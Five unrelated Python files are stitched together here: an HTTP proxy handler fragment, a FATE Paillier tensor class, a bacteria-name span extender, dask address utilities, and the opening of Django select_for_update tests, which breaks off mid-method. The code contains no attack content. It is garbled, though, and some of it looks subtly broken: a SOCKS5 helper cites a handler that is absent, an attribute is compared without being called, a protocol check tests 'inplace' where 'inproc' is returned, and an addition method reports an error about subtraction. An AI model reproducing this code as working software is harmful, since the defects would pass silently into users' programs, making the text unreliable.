# xlog.warn("https req method not known:%s", method)
if url.startswith("http://") or url.startswith("HTTP://"):
o = urlparse.urlparse(url)
host, port = netloc_to_host_port(o.netloc)
p = url[7:].find("/")
if p >= 0:
path = url[7+p:]
else:
path = "/"
else:
header_block = self.read_headers()
lines = header_block.split("\r\n")
path = url
host = None
for line in lines:
key, _, value = line.rpartition(":")
if key.lower == "host":
host, port = netloc_to_host_port(value)
break
if host is None:
xlog.warn("http proxy host can't parsed. %s %s", req_line, header_block)
self.connection.send(b'HTTP/1.1 500 Fail\r\n\r\n')
return
sock = self.connection
conn_id = proxy_session.create_conn(sock, host, port)
if not conn_id:
xlog.warn("create conn fail")
sock.send(b'HTTP/1.1 500 Fail\r\n\r\n')
return
xlog.info("http %r connect to %s:%d conn_id:%d", self.client_address, host, port, conn_id)
new_req_line = "%s %s %s" % (method, path, http_version)
left_buf = new_req_line + self.read_buffer[(len(req_line) + 1):]
g.session.conn_list[conn_id].transfer_received_data(left_buf)
g.session.conn_list[conn_id].start(block=True)
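# A minimal sketch (illustrative, not part of the original handler) of the byte
# layout that socks5_handler() above expects for a domain-name CONNECT request;
# the helper name and the host/port values are assumptions for demonstration.
def _build_socks5_connect_request(host, port):
    """Build a SOCKS5 greeting plus CONNECT request for a domain name (RFC 1928)."""
    greeting = b"\x05\x01\x00"                # VER=5, NMETHODS=1, METHOD=0 (no auth)
    request = (b"\x05\x01\x00\x03"            # VER, CMD=CONNECT, RSV, ATYP=3 (domain)
               + struct.pack("B", len(host))  # length-prefixed domain name (bytes)
               + host
               + struct.pack(">H", port))     # destination port, big-endian
    return greeting + request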
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
from federatedml.util import LOGGER
from fate_arch.session import computing_session
from fate_arch.abc import CTableABC
class PaillierTensor(object):
def __init__(self, obj, partitions=1):
if obj is None:
raise ValueError("Cannot convert None to Paillier tensor")
if isinstance(obj, (list, np.ndarray)):
self._ori_data = obj
self._partitions = partitions
self._obj = computing_session.parallelize(obj,
include_key=False,
partition=partitions)
elif isinstance(obj, CTableABC):
self._ori_data = None
self._partitions = obj.partitions
self._obj = obj
else:
raise ValueError(f"Cannot convert obj to Paillier tensor, object type is {type(obj)}")
LOGGER.debug("tensor's partition is {}".format(self._partitions))
def __add__(self, other):
if isinstance(other, PaillierTensor):
return PaillierTensor(self._obj.join(other._obj, lambda v1, v2: v1 + v2))
elif isinstance(other, CTableABC):
return PaillierTensor(self._obj.join(other, lambda v1, v2: v1 + v2))
elif isinstance(other, (np.ndarray, int, float)):
return PaillierTensor(self._obj.mapValues(lambda v: v + other))
else:
raise ValueError(f"Unrecognized type {type(other)}, dose not support subtraction")
def __radd__(self, other):
return self.__add__(other)
def __sub__(self, other):
if isinstance(other, PaillierTensor):
return PaillierTensor(self._obj.join(other._obj, lambda v1, v2: v1 - v2))
elif isinstance(other, CTableABC):
return PaillierTensor(self._obj.join(other, lambda v1, v2: v1 - v2))
elif isinstance(other, (np.ndarray, int, float)):
return PaillierTensor(self._obj.mapValues(lambda v: v - other))
else:
raise ValueError(f"Unrecognized type {type(other)}, dose not support subtraction")
def __rsub__(self, other):
return self.__sub__(other)
def __mul__(self, other):
if isinstance(other, (int, float)):
return PaillierTensor(self._obj.mapValues(lambda val: val * other))
elif isinstance(other, np.ndarray):
return PaillierTensor(self._obj.mapValues(lambda val: np.matmul(val, other)))  # an ndarray operand is matrix-multiplied per partition; use multiply() for element-wise
elif isinstance(other, CTableABC):
other = PaillierTensor(other)
return self.__mul__(other)
elif isinstance(other, PaillierTensor):
ret = self.numpy() * other.numpy()
return PaillierTensor(ret, partitions=max(self.partitions, other.partitions))
def matmul(self, other):
if isinstance(other, np.ndarray):
if len(other.shape) != 2:
raise ValueError("Only Support 2-D multiplication in matmul op, "
"if you want to do 3-D, use fast_multiply_3d")
return self.fast_matmul_2d(other)
def multiply(self, other):
if isinstance(other, np.ndarray):
if other.shape != self.shape:
raise ValueError(f"operands could not be broadcast together with shapes {self.shape} {other.shape}")
rhs = PaillierTensor(other, partitions=self.partitions)
return self.multiply(rhs)
elif isinstance(other, CTableABC):
other = PaillierTensor(other)
return self.multiply(other)
elif isinstance(other, PaillierTensor):
return PaillierTensor(self._obj.join(other._obj, lambda v1, v2: v1 * v2))
else:
raise ValueError(f"Not support type in multiply op {type(other)}")
@property
def T(self):
if self._ori_data is None:
self._ori_data = self.numpy()
new_data = self._ori_data.T
return PaillierTensor(new_data, self.partitions)
@property
def partitions(self):
return self._partitions
def get_obj(self):
return self._obj
@property
def shape(self):
if self._ori_data is not None:
return self._ori_data.shape
else:
first_dim = self._obj.count()
second_dim = self._obj.first()[1].shape
return tuple([first_dim] + list(second_dim))
def mean(self, axis=-1):
if axis == -1:
size = 1
for shape in self._ori_data.shape:
size *= shape
if not size:
raise ValueError("shape of data is zero, it should be positive")
return self._obj.mapValues(lambda val: np.sum(val)).reduce(lambda val1, val2: val1 + val2) / size
else:
ret_obj = self._obj.mapValues(lambda val: np.mean(val, axis - 1))
return PaillierTensor(ret_obj)
def reduce_sum(self):
return self._obj.reduce(lambda t1, t2: t1 + t2)
def map_ndarray_product(self, other):
if isinstance(other, np.ndarray):
return PaillierTensor(self._obj.mapValues(lambda val: val * other))
else:
raise ValueError('only support numpy array')
def numpy(self):
if self._ori_data is not None:
return self._ori_data
arr = [None for i in range(self._obj.count())]
for k, v in self._obj.collect():
arr[k] = v
self._ori_data = np.array(arr, dtype=arr[0].dtype)
return self._ori_data
def encrypt(self, encrypt_tool):
return PaillierTensor(encrypt_tool.encrypt(self._obj))
def decrypt(self, decrypt_tool):
return PaillierTensor(self._obj.mapValues(lambda val: decrypt_tool.recursive_decrypt(val)))
def encode(self, encoder):
return PaillierTensor(self._obj.mapValues(lambda val: encoder.encode(val)))
def decode(self, decoder):
return PaillierTensor(self._obj.mapValues(lambda val: decoder.decode(val)))
@staticmethod
def _vector_mul(kv_iters):
ret_mat = None
for k, v in kv_iters:
tmp_mat = np.outer(v[0], v[1])
if ret_mat is not None:
ret_mat += tmp_mat
else:
ret_mat = tmp_mat
return ret_mat
def fast_matmul_2d(self, other):
"""
Matrix multiplication between two matrices; please ensure that self's shape is (m, n) and other's shape is (m, k).
The result is an (n, k) matrix.
"""
if isinstance(other, np.ndarray):
mat_tensor = PaillierTensor(other, partitions=self.partitions)
return self.fast_matmul_2d(mat_tensor)
if isinstance(other, CTableABC):
other = PaillierTensor(other)
func = self._vector_mul
ret_mat = self._obj.join(other.get_obj(), lambda vec1, vec2: (vec1, vec2)).applyPartitions(func).reduce(
lambda mat1, mat2: mat1 + mat2)
return ret_mat
def matmul_3d(self, other, multiply='left'):
assert multiply in ['left', 'right']
if isinstance(other, PaillierTensor):
mat = other
elif isinstance(other, CTableABC):
mat = PaillierTensor(other)
elif isinstance(other, np.ndarray):
mat = PaillierTensor(other, partitions=self.partitions)
else:
raise ValueError('only numpy arrays, CTableABC tables and PaillierTensor are supported')
if multiply == 'left':
return PaillierTensor(self._obj.join(mat._obj, lambda val1, val2: np.tensordot(val1, val2, (1, 0))),
partitions=self._partitions)
if multiply == 'right':
return PaillierTensor(mat._obj.join(self._obj, lambda val1, val2: np.tensordot(val1, val2, (1, 0))),
partitions=self._partitions)
def element_wise_product(self, other):
if isinstance(other, np.ndarray):
mat = PaillierTensor(other, partitions=self.partitions)
elif isinstance(other, CTableABC):
mat = PaillierTensor(other)
else:
mat = other
return PaillierTensor(self._obj.join(mat._obj, lambda val1, val2: val1 * val2))
def squeeze(self, axis):
if axis == 0:
return PaillierTensor(list(self._obj.collect())[0][1], partitions=self.partitions)
else:
return PaillierTensor(self._obj.mapValues(lambda val: np.squeeze(val, axis=axis - 1)))
def select_columns(self, select_table):
return PaillierTensor(self._obj.join(select_table, lambda v1, v2: v1[v2]))
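# A plain-numpy sketch (an illustration, not part of the class) of what
# fast_matmul_2d() computes: with self laid out row-wise as an (m, n) array and
# other as an (m, k) array, summing the outer products of paired rows gives
# self.T @ other, i.e. an (n, k) matrix. The helper name is hypothetical.
def _fast_matmul_2d_reference(a, b):
    """Reference result of PaillierTensor.fast_matmul_2d on plaintext arrays."""
    ret_mat = None
    for row_a, row_b in zip(a, b):          # pair rows, as the join on keys does
        tmp_mat = np.outer(row_a, row_b)    # (n, k) contribution of one row pair
        ret_mat = tmp_mat if ret_mat is None else ret_mat + tmp_mat
    return ret_mat                          # equals a.T @ b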
|
|
import sys, os
try:
import xml.etree.cElementTree as ET
except ImportError:
import cElementTree as ET
sys.path.append(os.path.dirname(os.path.abspath(__file__))+"/../..")
import Utils.ElementTreeUtils as ETUtils
import Utils.Range as Range
from collections import defaultdict
import ExampleBuilders.PhraseTriggerExampleBuilder
def tokenize(text):
tokens = [""]
inText = False
for c in text:
if c.isspace():
if inText:
tokens.append(c)
inText = False
else:
tokens[-1] += c
else: # text
if inText:
tokens[-1] += c
else:
tokens.append(c)
inText = True
if tokens[0] == "" and len(tokens) > 1:
return tokens[1:]
else:
return tokens
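# Illustrative example (the helper below is hypothetical and never called):
# whitespace runs are kept as their own tokens so that character offsets can be
# reconstructed by summing token lengths.
def _tokenize_example():
    assert tokenize("E. coli  K-12") == ["E.", " ", "coli", "  ", "K-12"]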
def isExtraWord(token, toLower=True, relPos = None):
if token[-1] == ".":
token = token[:-1]
if toLower:
token = token.lower()
if token in ["heliothrix", "caldicellulosiruptor"]:
return True
if token == "genus":
return True
if token == "bacterium":
return True
if token == "bacteria":
return True
elif token == "strain":
return True
elif token == "organisms":
return True
elif token == "fetus":
return True
elif token == "venerealis":
return True
elif token == "subsp":
return True
elif token == "subspecies":
return True
elif token == "ssp":
return True
elif token == "-like":
return True
elif token == "sp":
return True
#elif token == "species":
# return True
elif token == "serotope":
return True
elif token == "psjn":
return True
#elif token == "phylum":
# return True
return False
def isBacteriaToken(token, bacteriaTokens, relPos):
while len(token) > 0 and not token[0].isalnum():
token = token[1:]
if relPos > 0:
while len(token) > 0 and token[-1] == ")":
token = token[:-1]
# E., Y. etc.
if len(token) == 2 and token[0].isupper() and token[1] == ".":
return True
# Chl. ja Cfl.
if len(token) == 4 and token[0].isupper() and token[-1] == "." and token[1:3].islower():
return True
if len(token) == 0: return False
if token[-1] == ".":
token = token[:-1]
if len(token) == 0: return False
if token[-1] == ",":
return False
if relPos < 0: # no commas before head
return False
else:
token = token[:-1]
if len(token) == 0: return False
tokenLower = token.lower()
if tokenLower in bacteriaTokens:
return True
for split in tokenLower.split("-"):
if split in bacteriaTokens:
return True
for split in tokenLower.split("/"):
if split in bacteriaTokens:
return True
if token == "JIP":
return True
if tokenLower.endswith("lla"):
return True
elif tokenLower.endswith("ica"):
return True
elif tokenLower.endswith("us") and tokenLower != "thus":
return True
elif tokenLower.endswith("um") and tokenLower not in ["phylum"]:
return True
elif tokenLower.endswith("ans") and tokenLower != "humans":
return True
elif tokenLower.endswith("bacter"):
return True
elif tokenLower.endswith("is") and tokenLower not in ["is", "this"]:
return True
#elif tokenLower.endswith("es"):
# return True
elif tokenLower.endswith("ma"):
return True
elif tokenLower.endswith("ia"):
return True
elif tokenLower.endswith("ii"):
return True
elif tokenLower.endswith("li"):
return True
elif tokenLower.endswith("nii"):
return True
elif tokenLower.endswith("plasma"):
return True
elif tokenLower.endswith("plasmas"):
return True
elif tokenLower.endswith("ae"):
return True
elif tokenLower.endswith("ri"):
return True
elif tokenLower.endswith("ni"):
return True
if isExtraWord(token, toLower=True):
return True
isTrue = True
for c in token:
if c.isdigit() or c == "-" or c.isupper():
continue
else:
isTrue = False
break
if isTrue:
return True
return False
def extend(input, output=None, entityTypes=["Bacterium"], verbose=False):
if not (ET.iselement(input) and input.tag == "sentence"):
print >> sys.stderr, "Loading corpus file", input
corpusTree = ETUtils.ETFromObj(input)
corpusRoot = corpusTree.getroot()
bacteriaTokens = ExampleBuilders.PhraseTriggerExampleBuilder.getBacteriaTokens()
if not (ET.iselement(input) and input.tag == "sentence"):
sentences = corpusRoot.getiterator("sentence")
else:
sentences = [input]
counts = defaultdict(int)
for sentence in sentences:
incorrectCount = 0
sentenceText = sentence.get("text")
tokens = tokenize(sentenceText)
for entity in sentence.findall("entity"):
counts["all-entities"] += 1
if entity.get("type") not in entityTypes:
continue
headOffset = entity.get("headOffset")
if headOffset == None:
if verbose: print "WARNING, no head offset for entity", entity.get("id")
headOffset = entity.get("charOffset")
headOffset = Range.charOffsetToTuples(headOffset)[0]
charOffset = entity.get("charOffset")
assert charOffset != None, "WARNING, no head offset for entity " + str(entity.get("id"))
charOffset = Range.charOffsetToTuples(charOffset)[0]
tokPos = [0,0]
tokIndex = None
# find main token
for i in range(len(tokens)):
token = tokens[i]
tokPos[1] = tokPos[0] + len(token) # - 1
if Range.overlap(headOffset, tokPos):
tokIndex = i
break
tokPos[0] += len(token)
assert tokIndex != None, (entity.get("id"), entity.get("text"), tokens)
skip = False
if tokPos[0] < headOffset[0]:
tokPos = headOffset
skip = True
if not skip:
# Extend before
beginIndex = tokIndex
for i in range(tokIndex-1, -1, -1):
token = tokens[i]
if token.isspace():
continue
if not isBacteriaToken(token, bacteriaTokens, i - tokIndex):
beginIndex = i + 1
break
if i == 0:
beginIndex = i
while tokens[beginIndex].isspace() or isExtraWord(tokens[beginIndex], toLower=False):
beginIndex += 1
if beginIndex >= tokIndex:
beginIndex = tokIndex
break
# Extend after
endIndex = tokIndex
if tokens[tokIndex][-1] != ",":
endIndex = tokIndex
for i in range(tokIndex+1, len(tokens)):
token = tokens[i]
if token.isspace():
continue
if not isBacteriaToken(token, bacteriaTokens, i - tokIndex):
endIndex = i - 1
break
if i == len(tokens) - 1:
endIndex = i
while tokens[endIndex].isspace():
endIndex -= 1
# Modify range
if tokIndex > beginIndex:
for token in reversed(tokens[beginIndex:tokIndex]):
tokPos[0] -= len(token)
if tokIndex < endIndex:
for token in tokens[tokIndex+1:endIndex+1]:
tokPos[1] += len(token)
# Attempt to remove trailing periods and commas
while not sentenceText[tokPos[1] - 1].isalnum():
tokPos[1] -= 1
if tokPos[1] < tokPos[0] + 1:
tokPos[1] = tokPos[0] + 1
break
while not sentenceText[tokPos[0]].isalnum():
tokPos[0] += 1
if tokPos[0] >= tokPos[1]:
tokPos[0] = tokPos[1] - 1
break
# Split merged names
#newPos = [tokPos[0], tokPos[1]]
#for split in sentenceText[tokPos[0]:tokPos[1]+1].split("/"):
# newPos[0] += len(split)
# if
# Insert changed charOffset
counts["entities"] += 1
newOffset = tuple(tokPos)
newOffsetString = Range.tuplesToCharOffset([newOffset])
if verbose:
print "Entity", entity.get("id"),
#print [entity.get("text"), sentenceText[headOffset[0]:headOffset[1]+1], sentenceText[newOffset[0]:newOffset[1]+1]],
print [entity.get("text"), sentenceText[headOffset[0]:headOffset[1]], sentenceText[newOffset[0]:newOffset[1]]],
print [entity.get("charOffset"), entity.get("headOffset"), newOffsetString], "Sent:", len(sentence.get("text")),
if newOffset != headOffset:
counts["extended"] += 1
if verbose: print "EXTENDED",
if newOffset == charOffset:
counts["correct"] += 1
if verbose: print "CORRECT"
else:
counts["incorrect"] += 1
incorrectCount += 1
if verbose: print "INCORRECT"
entity.set("charOffset", newOffsetString)
#entity.set("text", sentenceText[newOffset[0]:newOffset[1]+1])
entity.set("text", sentenceText[newOffset[0]:newOffset[1]])
if incorrectCount > 0 and verbose:
print "TOKENS:", "|".join(tokens)
print "--------------------------------"
if verbose:
print counts
if not (ET.iselement(input) and input.tag == "sentence"):
if output != None:
print >> sys.stderr, "Writing output to", output
ETUtils.write(corpusRoot, output)
return corpusTree
if __name__=="__main__":
print >> sys.stderr, "##### Extend Triggers #####"
# Import Psyco if available
try:
import psyco
psyco.full()
print >> sys.stderr, "Found Psyco, using"
except ImportError:
print >> sys.stderr, "Psyco not installed"
from optparse import OptionParser
optparser = OptionParser(usage="%prog [options]\nExtend bacteria trigger entity spans in a corpus.")
optparser.add_option("-i", "--input", default=None, dest="input", help="Corpus in analysis format", metavar="FILE")
optparser.add_option("-o", "--output", default=None, dest="output", help="Corpus in analysis format", metavar="FILE")
optparser.add_option("-d", "--debug", default=False, action="store_true", dest="debug", help="")
(options, args) = optparser.parse_args()
assert(options.input != None)
#assert(options.output != None)
extend(options.input, options.output, verbose=options.debug)
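# Example invocation (the module filename is illustrative only):
#   python ExtendTriggers.py -i corpus.xml -o corpus-extended.xml -d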
|
|
import itertools
import dask
from . import registry
from ..utils import get_ip_interface
DEFAULT_SCHEME = dask.config.get("distributed.comm.default-scheme")
def parse_address(addr, strict=False):
"""
Split address into its scheme and scheme-dependent location string.
>>> parse_address('tcp://127.0.0.1')
('tcp', '127.0.0.1')
If strict is set to true the address must have a scheme.
"""
if not isinstance(addr, str):
raise TypeError("expected str, got %r" % addr.__class__.__name__)
scheme, sep, loc = addr.rpartition("://")
if strict and not sep:
msg = (
"Invalid url scheme. "
"Must include protocol like tcp://localhost:8000. "
"Got %s" % addr
)
raise ValueError(msg)
if not sep:
scheme = DEFAULT_SCHEME
return scheme, loc
def unparse_address(scheme, loc):
"""
Undo parse_address().
>>> unparse_address('tcp', '127.0.0.1')
'tcp://127.0.0.1'
"""
return "%s://%s" % (scheme, loc)
def normalize_address(addr):
"""
Canonicalize address, adding a default scheme if necessary.
>>> normalize_address('tls://[::1]')
'tls://[::1]'
>>> normalize_address('[::1]')
'tcp://[::1]'
"""
return unparse_address(*parse_address(addr))
def parse_host_port(address, default_port=None):
"""
Parse an endpoint address given in the form "host:port".
"""
if isinstance(address, tuple):
return address
def _fail():
raise ValueError("invalid address %r" % (address,))
def _default():
if default_port is None:
raise ValueError("missing port number in address %r" % (address,))
return default_port
if "://" in address:
_, address = address.split("://")
if address.startswith("["):
# IPv6 notation: '[addr]:port' or '[addr]'.
# The address may contain multiple colons.
host, sep, tail = address[1:].partition("]")
if not sep:
_fail()
if not tail:
port = _default()
else:
if not tail.startswith(":"):
_fail()
port = tail[1:]
else:
# Generic notation: 'addr:port' or 'addr'.
host, sep, port = address.partition(":")
if not sep:
port = _default()
elif ":" in host:
_fail()
return host, int(port)
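# A few worked examples (a sketch, not part of the original module; the helper
# name is hypothetical) of the notations parse_host_port() accepts.
def _parse_host_port_examples():
    assert parse_host_port("127.0.0.1:8786") == ("127.0.0.1", 8786)
    assert parse_host_port("tcp://127.0.0.1:8786") == ("127.0.0.1", 8786)
    assert parse_host_port("[::1]:8786") == ("::1", 8786)
    assert parse_host_port("127.0.0.1", default_port=80) == ("127.0.0.1", 80)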
def unparse_host_port(host, port=None):
"""
Undo parse_host_port().
"""
if ":" in host and not host.startswith("["):
host = "[%s]" % host
if port is not None:
return "%s:%s" % (host, port)
else:
return host
def get_address_host_port(addr, strict=False):
"""
Get a (host, port) tuple out of the given address.
For definition of strict check parse_address
ValueError is raised if the address scheme doesn't allow extracting
the requested information.
>>> get_address_host_port('tcp://1.2.3.4:80')
('1.2.3.4', 80)
"""
scheme, loc = parse_address(addr, strict=strict)
backend = registry.get_backend(scheme)
try:
return backend.get_address_host_port(loc)
except NotImplementedError:
raise ValueError(
"don't know how to extract host and port for address %r" % (addr,)
)
def get_address_host(addr):
"""
Return a hostname / IP address identifying the machine this address
is located on.
In contrast to get_address_host_port(), this function should always
succeed for well-formed addresses.
>>> get_address_host('tcp://1.2.3.4:80')
'1.2.3.4'
"""
scheme, loc = parse_address(addr)
backend = registry.get_backend(scheme)
return backend.get_address_host(loc)
def get_local_address_for(addr):
"""
Get a local listening address suitable for reaching *addr*.
For instance, trying to reach an external TCP address will return
a local TCP address that's routable to that external address.
>>> get_local_address_for('tcp://8.8.8.8:1234')
'tcp://192.168.1.68'
>>> get_local_address_for('tcp://127.0.0.1:1234')
'tcp://127.0.0.1'
"""
scheme, loc = parse_address(addr)
backend = registry.get_backend(scheme)
return unparse_address(scheme, backend.get_local_address_for(loc))
def resolve_address(addr):
"""
Apply scheme-specific address resolution to *addr*, replacing
all symbolic references with concrete location specifiers.
In practice, this can mean hostnames are resolved to IP addresses.
>>> resolve_address('tcp://localhost:8786')
'tcp://127.0.0.1:8786'
"""
scheme, loc = parse_address(addr)
backend = registry.get_backend(scheme)
return unparse_address(scheme, backend.resolve_address(loc))
def uri_from_host_port(host_arg, port_arg, default_port):
"""
Process the *host* and *port* CLI options.
Return a URI.
"""
# Much of distributed depends on a well-known IP being assigned to
# each entity (Worker, Scheduler, etc.), so avoid "universal" addresses
# like '' which would listen on all registered IPs and interfaces.
scheme, loc = parse_address(host_arg or "")
host, port = parse_host_port(
loc, port_arg if port_arg is not None else default_port
)
if port is None and port_arg is None:
port_arg = default_port
if port and port_arg and port != port_arg:
raise ValueError(
"port number given twice in options: "
"host %r and port %r" % (host_arg, port_arg)
)
if port is None and port_arg is not None:
port = port_arg
# Note `port = 0` means "choose a random port"
if port is None:
port = default_port
loc = unparse_host_port(host, port)
addr = unparse_address(scheme, loc)
return addr
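# Illustrative results, assuming the configured default scheme is "tcp":
#   uri_from_host_port("127.0.0.1", None, 8786)   -> "tcp://127.0.0.1:8786"
#   uri_from_host_port("tls://10.0.0.1", 8786, 0) -> "tls://10.0.0.1:8786"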
def addresses_from_user_args(
host=None,
port=None,
interface=None,
protocol=None,
peer=None,
security=None,
default_port=0,
) -> list:
""" Get a list of addresses if the inputs are lists
This is like ``address_from_user_args`` except that it also accepts lists
for some of the arguments. If these arguments are lists then it will map
over them accordingly.
Examples
--------
>>> addresses_from_user_args(host="127.0.0.1", protocol=["inproc", "tcp"])
["inproc://127.0.0.1:", "tcp://127.0.0.1:"]
"""
def listify(obj):
if isinstance(obj, (tuple, list)):
return obj
else:
return itertools.repeat(obj)
if any(isinstance(x, (tuple, list)) for x in (host, port, interface, protocol)):
return [
address_from_user_args(
host=h,
port=p,
interface=i,
protocol=pr,
peer=peer,
security=security,
default_port=default_port,
)
for h, p, i, pr in zip(*map(listify, (host, port, interface, protocol)))
]
else:
return [
address_from_user_args(
host, port, interface, protocol, peer, security, default_port
)
]
def address_from_user_args(
host=None,
port=None,
interface=None,
protocol=None,
peer=None,
security=None,
default_port=0,
) -> str:
""" Get an address to listen on from common user provided arguments """
if security and security.require_encryption and not protocol:
protocol = "tls"
if protocol and protocol.rstrip("://") == "inplace":
if host or port or interface:
raise ValueError(
"Can not specify inproc protocol and host or port or interface"
)
else:
return "inproc://"
if interface:
if host:
raise ValueError("Can not specify both interface and host", interface, host)
else:
host = get_ip_interface(interface)
if protocol and host and "://" not in host:
host = protocol.rstrip("://") + "://" + host
if host or port:
addr = uri_from_host_port(host, port, default_port)
else:
addr = ""
if protocol:
addr = protocol.rstrip("://") + "://" + addr.split("://")[-1]
return addr
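# A short sketch (hypothetical helper, never called) of typical results from
# address_from_user_args(); the inproc case short-circuits before any host/port
# handling.
def _address_from_user_args_examples():
    assert address_from_user_args(host="127.0.0.1", port=8786, protocol="tcp") == "tcp://127.0.0.1:8786"
    assert address_from_user_args(protocol="inproc") == "inproc://"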
|
|
import threading
import time
from unittest import mock
from multiple_database.routers import TestRouter
from django.core.exceptions import FieldError
from django.db import (
DatabaseError, NotSupportedError, connection, connections, router,
transaction,
)
from django.test import (
TransactionTestCase, override_settings, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.test.utils import CaptureQueriesContext
from .models import City, Country, EUCity, EUCountry, Person, PersonProfile
class SelectForUpdateTests(TransactionTestCase):
available_apps = ['select_for_update']
def setUp(self):
# This is executed in autocommit mode so that code in
# run_select_for_update can see this data.
self.country1 = Country.objects.create(name='Belgium')
self.country2 = Country.objects.create(name='France')
self.city1 = City.objects.create(name='Liberchies', country=self.country1)
self.city2 = City.objects.create(name='Samois-sur-Seine', country=self.country2)
self.person = Person.objects.create(name='Reinhardt', born=self.city1, died=self.city2)
self.person_profile = PersonProfile.objects.create(person=self.person)
# We need another database connection in transaction to test that one
# connection issuing a SELECT ... FOR UPDATE will block.
self.new_connection = connection.copy()
def tearDown(self):
try:
self.end_blocking_transaction()
except (DatabaseError, AttributeError):
pass
self.new_connection.close()
def start_blocking_transaction(self):
self.new_connection.set_autocommit(False)
# Start a blocking transaction. At some point,
# end_blocking_transaction() should be called.
self.cursor = self.new_connection.cursor()
sql = 'SELECT * FROM %(db_table)s %(for_update)s;' % {
'db_table': Person._meta.db_table,
'for_update': self.new_connection.ops.for_update_sql(),
}
self.cursor.execute(sql, ())
self.cursor.fetchone()
def end_blocking_transaction(self):
# Roll back the blocking transaction.
self.cursor.close()
self.new_connection.rollback()
self.new_connection.set_autocommit(True)
def has_for_update_sql(self, queries, **kwargs):
# Examine the SQL that was executed to determine whether it
# contains the 'SELECT..FOR UPDATE' stanza.
for_update_sql = connection.ops.for_update_sql(**kwargs)
return any(for_update_sql in query['sql'] for query in queries)
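    # connection.ops.for_update_sql(**kwargs) returns the backend's locking
    # clause, e.g. 'FOR UPDATE', 'FOR UPDATE NOWAIT', 'FOR UPDATE SKIP LOCKED'
    # or 'FOR UPDATE OF <columns>' (exact spelling varies by backend).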
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_sql_generated(self):
"""
The backend's FOR UPDATE variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update())
self.assertTrue(self.has_for_update_sql(ctx.captured_queries))
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_for_update_sql_generated_nowait(self):
"""
The backend's FOR UPDATE NOWAIT variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(nowait=True))
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, nowait=True))
@skipUnlessDBFeature('has_select_for_update_skip_locked')
def test_for_update_sql_generated_skip_locked(self):
"""
The backend's FOR UPDATE SKIP LOCKED variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(skip_locked=True))
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, skip_locked=True))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_generated_of(self):
"""
The backend's FOR UPDATE OF variant appears in the generated SQL when
select_for_update() is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.select_related(
'born__country',
).select_for_update(
of=('born__country',),
).select_for_update(
of=('self', 'born__country')
))
features = connections['default'].features
if features.select_for_update_of_column:
expected = [
'select_for_update_person"."id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_person', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(of=('self',)))
if connection.features.select_for_update_of_column:
expected = ['select_for_update_eucountry"."country_ptr_id']
else:
expected = ['select_for_update_eucountry']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(of=('self', 'country_ptr',)))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucountry"."country_ptr_id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_eucountry', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_related_model_inheritance_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCity.objects.select_related('country').select_for_update(
of=('self', 'country'),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucity"."id',
'select_for_update_eucountry"."country_ptr_id',
]
else:
expected = ['select_for_update_eucity', 'select_for_update_eucountry']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_nested_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCity.objects.select_related('country').select_for_update(
of=('self', 'country__country_ptr',),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucity"."id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_eucity', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_multilevel_model_inheritance_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(
of=('country_ptr', 'country_ptr__entity_ptr'),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_country"."entity_ptr_id',
'select_for_update_entity"."id',
]
else:
expected = ['select_for_update_country', 'select_for_update_entity']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_followed_by_values(self):
